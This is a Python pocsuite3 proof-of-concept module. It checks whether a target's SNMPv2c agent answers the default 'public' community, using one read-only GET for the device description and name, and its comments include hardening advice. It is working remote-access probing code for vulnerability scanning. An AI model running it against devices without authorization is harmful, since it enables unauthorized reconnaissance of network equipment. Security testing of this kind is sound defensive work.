snmp_v2_unauthorized.py
#!/usr/bin/env python
# coding: utf-8
from pysnmp.hlapi import getCmd, SnmpEngine, CommunityData, UdpTransportTarget, ContextData, ObjectType, ObjectIdentity
from urllib.parse import urlparse
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE
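class TestPOC(POCBase):
    """pocsuite3 check for an SNMP v2c agent that answers the default community.

    ``_verify`` sends a single SNMP GET for ``sysDescr.0`` and ``sysName.0``
    using the community string ``public``. A reply without an error shows that
    the agent grants read access to that community; the returned values are
    reported as evidence. Only a GET is issued (nothing is written to the
    agent) and no other community strings are tried.

    Typical hardening for a positive finding: replace default community
    strings, restrict SNMP to management hosts, and prefer SNMPv3 with
    authentication and privacy.
    """

    vulID = '0'
    version = '1.0'
    author = 'hancool'
    vulDate = '2019-1-8'
    createDate = '2019-1-8'
    updateDate = '2019-1-8'
    references = ['', ]
    name = 'SNMP unauthorized access'
    appPowerLink = ''
    appName = 'All'
    appVersion = 'v2'
    vulType = VUL_TYPE.UNAUTHORIZED_ACCESS
    category = POC_CATEGORY.EXPLOITS.REMOTE
    # NOTE(review): the dependency is unpinned, and the code below relies on
    # the synchronous, generator-style ``getCmd`` from ``pysnmp.hlapi`` --
    # confirm the installed pysnmp release still provides it, or pin one that
    # does.
    install_requires = ['pysnmp']
    # desc, in English: the SNMP community is left at its default setting; an
    # attacker can use this weakness to read sensitive information from
    # network devices.
    desc = '''
SNMP Community默认设置,攻击者可通过该漏洞泄露网络设备的敏感信息。
'''

    def _verify(self):
        """Probe the target's SNMP agent with the ``public`` community.

        Host and port come from ``self.url``; UDP port 161 is used when the
        URL carries no port.

        Returns:
            The ``Output`` built by ``parse_output``: success with
            ``VerifyInfo`` and ``extra`` filled in when the agent answered,
            failure otherwise.
        """

        def test_snmp(target, port=161, community='public'):
            """Issue one SNMPv2c GET and return ``(ok, detail)``.

            ``detail`` is a list of ``"oid = value"`` strings on success and
            an error message string on failure.
            """
            try:
                errorIndication, errorStatus, errorIndex, varBinds = next(
                    getCmd(
                        SnmpEngine(),
                        # mpModel -> 0: v1, 1: v2c
                        CommunityData(community, mpModel=1),
                        # One-second timeout and a single retry keep an
                        # unanswered probe short.
                        UdpTransportTarget(
                            (target, int(port)), timeout=1, retries=1),
                        ContextData(),
                        ObjectType(ObjectIdentity(
                            'SNMPv2-MIB', 'sysDescr', 0)),
                        ObjectType(ObjectIdentity(
                            'SNMPv2-MIB', 'sysName', 0)),
                    )
                )
                if errorIndication:
                    # Stringified so every failure detail has the same type.
                    return (False, str(errorIndication))
                if errorStatus:
                    # Conditional expression instead of ``a and b or c``,
                    # which falls through to '?' whenever ``b`` is falsy.
                    failed_at = (varBinds[int(errorIndex) - 1][0]
                                 if errorIndex else '?')
                    return (False, '%s at %s' % (
                        errorStatus.prettyPrint(), failed_at))
                evidence = [
                    ' = '.join(x.prettyPrint() for x in varBind)
                    for varBind in varBinds
                ]
                return (True, evidence)
            except Exception as e:
                # Best-effort probe: any library or socket error is reported
                # as "no usable answer" rather than aborting the scan.
                return (False, str(e))

        result = {}
        pr = urlparse(self.url)
        host = pr.hostname
        if not host:
            # No host could be parsed from the URL, so there is nothing to
            # probe; report the target as not affected.
            return self.parse_output(result)
        port = pr.port or 161

        # test_snmp already converts every Exception into a failure tuple, so
        # no try/except is needed here. The former bare ``except: pass`` could
        # only swallow KeyboardInterrupt/SystemExit, which now propagate.
        status, msg = test_snmp(host, port)
        if status:
            result['VerifyInfo'] = {'URL': '{}:{}'.format(host, port)}
            result['extra'] = {'evidence': msg}
        return self.parse_output(result)

    def _attack(self):
        """Attack mode runs the same read-only check as ``_verify``."""
        return self._verify()

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``.

        A non-empty ``result`` is reported as success; an empty one is
        reported as failure with the message ``'not vulnerability'``.
        """
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output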
# Module-level call: passes TestPOC to pocsuite3's register_poc when this file is loaded.
register_poc(TestPOC)